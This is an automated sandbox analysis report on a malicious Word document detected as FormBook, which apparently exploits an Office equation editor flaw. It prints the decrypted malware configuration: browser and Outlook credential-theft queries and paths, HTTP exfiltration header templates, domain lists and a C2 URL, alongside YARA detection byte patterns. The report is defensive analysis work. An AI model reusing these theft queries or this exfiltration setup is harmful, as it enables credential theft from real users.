Play interactive tour

Edit tour

Analysis Report IMG-11862.doc

Overview

General Information

Sample Name:	IMG-11862.doc
Analysis ID:	345148
MD5:	3bae5b3c3fd75495623e7b2c77d6a63f
SHA1:	2feb9e59edbdf27d6a4aa92c2090eabf12d02ea1
SHA256:	a814890399194524b5be9cd3e21dce6f1c2272d1cf2dcaa8433e0cfc6ef2b06b
Tags:	doc
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Allocates memory in foreign processes

Connects to a URL shortener service

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2440 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 1976 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

69577.exe (PID: 1484 cmdline: C:\Users\Public\69577.exe MD5: 5A7E3E87F007DA7D39BD5CB58CAC10D0)

AddInProcess32.exe (PID: 2824 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: DA55A7AED2F65D6104E1A79EE067CC00)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

systray.exe (PID: 2396 cmdline: C:\Windows\SysWOW64\systray.exe MD5: DF6923839C6A8F776F0DA704C5F4CEA5)

cmd.exe (PID: 2880 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbf", "KEY1_OFFSET 0x1d5ca", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1d6d3", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x3a0289d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d719b", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad011e04", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "whatchicken.com", "sarayatalk.com", "madammomala.info", "himizoli.pro", "korobkapaket.ltda", "amd-investissement.com", "southerneclipse2024.com", "g2vies.com", "roseyogacoach.com", "allprounlimted.com", "medicaresbenefit.com", "castagno.info", "showcertificates.com", "cheapcraftbeer.com", "roxorsuperstore.info", "ossierugs.com", "honeyandtuelle.com", "wotulove.com", "infomgt.net", "pinknadeboutique.com", "tophamfardy.com", "henry-app.com", "power2bank.com", "estivalconsultancy.com", "anyagenxy.com", "woomentrend.com", "cherishfloraldesign.com", "euroqq.info", "techologytestinginc.com", "jokerwirewheels.com", "bucklandnewton.net", "owldrinktothat.com", "laceystrucking.com", "englishprotips.com", "0852qcw.com", "joebowmanforlafayette.com", "mystrandnews.com", "1980vallejo.com", "miramelfruits.com", "jollfree.com", "renttoowngenius.com", "nepali-rudraksha.com", "chloeboinnot.com", "doitimpex.online", "edu4go.com", "gvanmp.com", "furnacerepairtacoma.net", "myfreecopyright.info", "listenmelody.com", "cbothwelltest2020081703.com", "bblfz.com", "baanboosakorn.com", "ancident.com", "serenityhomedits.com", "distinctivewearstore.com", "qianyin1b.com", "ywf-lishui.com", "luohu666.com", "studiocitylandscapedesigner.com", "thesunchronical.com", "6pbusiness.com", "shortsscape.com", "nbgurki.com", "smoothsailingexpress.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.theprintshop.ink/bsl/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9f72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa1ec:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37830:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37aaa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15d0f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x435cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x157fb:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x430b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15e11:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x436cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15f89:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x43847:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xac04:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x384c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14a76:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x42334:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb8fd:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x391bb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b9b1:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4926f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c9b4:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18a93:$sqlite3step: 68 34 1C 7B E1 0x18ba6:$sqlite3step: 68 34 1C 7B E1 0x46351:$sqlite3step: 68 34 1C 7B E1 0x46464:$sqlite3step: 68 34 1C 7B E1 0x18ac2:$sqlite3text: 68 38 2A 90 C5 0x18be7:$sqlite3text: 68 38 2A 90 C5 0x46380:$sqlite3text: 68 38 2A 90 C5 0x464a5:$sqlite3text: 68 38 2A 90 C5 0x18ad5:$sqlite3blob: 68 53 D8 7F 8C 0x18bfd:$sqlite3blob: 68 53 D8 7F 8C 0x46393:$sqlite3blob: 68 53 D8 7F 8C 0x464bb:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xbec30:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbeeaa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xed522:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xed79c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11adf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11b06c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xca9cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf92bf:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x126b8f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xca4b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf8dab:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12667b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xcaacf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf93c1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x126c91:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xcac47:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xf9539:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x126e09:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbf8c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xee1b4:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11ba84:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xcd751:$sqlite3step: 68 34 1C 7B E1 0xcd864:$sqlite3step: 68 34 1C 7B E1 0xfc043:$sqlite3step: 68 34 1C 7B E1 0xfc156:$sqlite3step: 68 34 1C 7B E1 0x129913:$sqlite3step: 68 34 1C 7B E1 0x129a26:$sqlite3step: 68 34 1C 7B E1 0xcd780:$sqlite3text: 68 38 2A 90 C5 0xcd8a5:$sqlite3text: 68 38 2A 90 C5 0xfc072:$sqlite3text: 68 38 2A 90 C5 0xfc197:$sqlite3text: 68 38 2A 90 C5 0x129942:$sqlite3text: 68 38 2A 90 C5 0x129a67:$sqlite3text: 68 38 2A 90 C5 0xcd793:$sqlite3blob: 68 53 D8 7F 8C 0xcd8bb:$sqlite3blob: 68 53 D8 7F 8C 0xfc085:$sqlite3blob: 68 53 D8 7F 8C 0xfc1ad:$sqlite3blob: 68 53 D8 7F 8C 0x129955:$sqlite3blob: 68 53 D8 7F 8C 0x129a7d:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 69577.exe PID: 1484	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.AddInProcess32.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.AddInProcess32.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
5.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
